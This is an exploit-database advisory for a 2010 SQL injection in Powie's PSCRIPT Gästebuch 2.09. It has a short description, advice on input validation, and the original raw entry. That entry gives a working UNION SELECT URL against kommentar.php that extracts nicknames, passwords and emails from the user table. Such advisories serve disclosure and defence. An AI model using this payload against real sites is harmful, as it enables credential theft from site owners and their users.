header-logo
Suggest Exploit
vendor:
Powie's PSCRIPT Gästebuch
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Powie's PSCRIPT Gästebuch
Affected Version From: 2.09
Affected Version To: 2.09
Patch Exists: NO
Related CWE: N/A
CPE: a:powie:powie's_pscript_gästebuch
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Powie’s PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability

A SQL injection vulnerability exists in Powie's PSCRIPT Gästebuch version 2.09 and earlier. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames, passwords, and emails stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name :  Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 29.03.2010
+Script  : Powie's PSCRIPT Gästebuch <= 2.09
+Download : -----------------
+Price : for free version
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.

---------------------------------------------------------------------------------------

 ___ ___ ___ ___                         _ _           _____           _         _
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/gb/kommentar.php?id=

+Exploitable   : http://www.site.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5
,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2

-----------------------------------------------------------------------------------------